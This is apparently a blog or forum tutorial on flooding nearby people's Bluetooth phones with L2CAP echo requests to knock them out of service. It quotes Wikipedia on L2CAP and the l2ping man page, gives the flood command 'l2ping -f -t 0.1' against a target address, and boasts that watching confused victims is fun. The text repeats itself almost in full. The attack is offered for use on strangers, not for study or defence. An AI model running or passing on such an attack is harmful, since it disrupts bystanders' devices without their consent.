Hi HS, due to my classes m a lot busy now a days, so taking out time to put away a small tut on:
We all know what Bluetooth is and how to use it, so m gonna skip that part.
We can find many Bluetooth handsets around us which are in active state. So lets just DOS them up.
Yes it is, since the Bluetooth devices also sends ping packets to discover nearby devices. So the same logic applies to them as well.
READ THIS ARTICLE from Wikipedia::
Logical link control and adaptation protocol (L2CAP)
L2CAP is used within the Bluetooth protocol stack. It passes packets to either the Host Controller Interface (HCI) or on a hostless system, directly to the Link Manager/ACL link.
L2CAP's functions include:
Multiplexing data between different higher layer protocols.
Segmentation and reassembly of packets.
Providing one-way transmission management of multicast data to a group of other Bluetooth devices.
Quality of service (QoS) management for higher layer protocols.
L2CAP is used to communicate over the host ACL link. Its connection is established after the ACL link has been set up.
In basic mode, L2CAP provides packets with a payload configurable up to 64 kB, with 672 bytes as the default MTU, and 48 bytes as the minimum mandatory supported MTU. In retransmission and flow control modes, L2CAP can be configured for reliable or asynchronous data per channel by performing retransmissions and CRC checks. Reliability in either of these modes is optionally and/or additionally guaranteed by the lower layer Bluetooth BDR/EDR air interface by configuring the number of retransmissions and flush timeout (time after which the radio will flush packets). In-order sequencing is guaranteed by the lower layer.
The EL2CAP specification adds an additional enhanced retransmission mode (ERTM) to the core specification, which is an improved version of retransmission and flow control modes. ERTM is required when using an AMP (Alternate MAC/PHY), such as 802.11abgn.
Well that was enough, the Bluetooth device uses L2CAP packets for pinging. So we will send out these packets in bulk for a successful attack.
1) You would need a bluetooth adapter which looks like these:
2) L2PING for Linux. It would be pre-installed in Backtrack and Kali versions.
Here's the complete man page of L2PING command::
NAME
l2ping - Send L2CAP echo request and receive answer
SYNOPSIS
l2ping [-i <hciX>] [-s size] [-c count] [-t timeout] [-d delay] [-f]
[-r] [-v] bd_addr
DESCRIPTION
L2ping sends a L2CAP echo request to the Bluetooth MAC address bd_addr
given in dotted hex notation.
OPTIONS
-i <hciX>
The command is applied to device hciX , which must be the name
of an installed Bluetooth device (X = 0, 1, 2, ...) If not
specified, the command will be sent to the first available Blue‐
tooth device.
-s size
The size of the data packets to be sent.
-c count
Send count number of packets then exit.
-t timeout
Wait timeout seconds for the response.
-d delay
Wait delay seconds between pings.
-f Kind of flood ping. Use with care! It reduces the delay time
between packets to 0.
-r Reverse ping (gnip?). Send echo response instead of echo
request.
-v Verify response payload is identical to request payload. It is
not required for remote stacks to return the request payload,
but most stacks do (including Bluez).
bd_addr
The Bluetooth MAC address to be pinged in dotted hex notation
like 01:02:03:ab:cd:ef or 01:EF:cd:aB:02:03
Fire up your terminal and type the command as per the man page above::
SAMPLE
l2ping -f -t 0.1 11:1f:23:12:21:aa
Successfully tested on many devices. It is fun to watch people act confused.
DOS ATTACKING BLUETOOTH DEVICES
We all know what Bluetooth is and how to use it, so m gonna skip that part.
We can find many Bluetooth handsets around us which are in active state. So lets just DOS them up.
IS IT POSSIBLE??
Yes it is, since the Bluetooth devices also sends ping packets to discover nearby devices. So the same logic applies to them as well.
PINGING BLUETOOTH ? WTF ??
READ THIS ARTICLE from Wikipedia::
Logical link control and adaptation protocol (L2CAP)
L2CAP is used within the Bluetooth protocol stack. It passes packets to either the Host Controller Interface (HCI) or on a hostless system, directly to the Link Manager/ACL link.
L2CAP's functions include:
Multiplexing data between different higher layer protocols.
Segmentation and reassembly of packets.
Providing one-way transmission management of multicast data to a group of other Bluetooth devices.
Quality of service (QoS) management for higher layer protocols.
L2CAP is used to communicate over the host ACL link. Its connection is established after the ACL link has been set up.
In basic mode, L2CAP provides packets with a payload configurable up to 64 kB, with 672 bytes as the default MTU, and 48 bytes as the minimum mandatory supported MTU. In retransmission and flow control modes, L2CAP can be configured for reliable or asynchronous data per channel by performing retransmissions and CRC checks. Reliability in either of these modes is optionally and/or additionally guaranteed by the lower layer Bluetooth BDR/EDR air interface by configuring the number of retransmissions and flush timeout (time after which the radio will flush packets). In-order sequencing is guaranteed by the lower layer.
The EL2CAP specification adds an additional enhanced retransmission mode (ERTM) to the core specification, which is an improved version of retransmission and flow control modes. ERTM is required when using an AMP (Alternate MAC/PHY), such as 802.11abgn.
I UNDERSTOOD ONLY L2CAP
Well that was enough, the Bluetooth device uses L2CAP packets for pinging. So we will send out these packets in bulk for a successful attack.
TOOL REQUIRED
1) You would need a bluetooth adapter which looks like these:
2) L2PING for Linux. It would be pre-installed in Backtrack and Kali versions.
THE COMMANDS
Here's the complete man page of L2PING command::
NAME
l2ping - Send L2CAP echo request and receive answer
SYNOPSIS
l2ping [-i <hciX>] [-s size] [-c count] [-t timeout] [-d delay] [-f]
[-r] [-v] bd_addr
DESCRIPTION
L2ping sends a L2CAP echo request to the Bluetooth MAC address bd_addr
given in dotted hex notation.
OPTIONS
-i <hciX>
The command is applied to device hciX , which must be the name
of an installed Bluetooth device (X = 0, 1, 2, ...) If not
specified, the command will be sent to the first available Blue‐
tooth device.
-s size
The size of the data packets to be sent.
-c count
Send count number of packets then exit.
-t timeout
Wait timeout seconds for the response.
-d delay
Wait delay seconds between pings.
-f Kind of flood ping. Use with care! It reduces the delay time
between packets to 0.
-r Reverse ping (gnip?). Send echo response instead of echo
request.
-v Verify response payload is identical to request payload. It is
not required for remote stacks to return the request payload,
but most stacks do (including Bluez).
bd_addr
The Bluetooth MAC address to be pinged in dotted hex notation
like 01:02:03:ab:cd:ef or 01:EF:cd:aB:02:03
THE ATTACK
Fire up your terminal and type the command as per the man page above::
SAMPLE
l2ping -f -t 0.1 11:1f:23:12:21:aa
Successfully tested on many devices. It is fun to watch people act confused.
No comments:
Post a Comment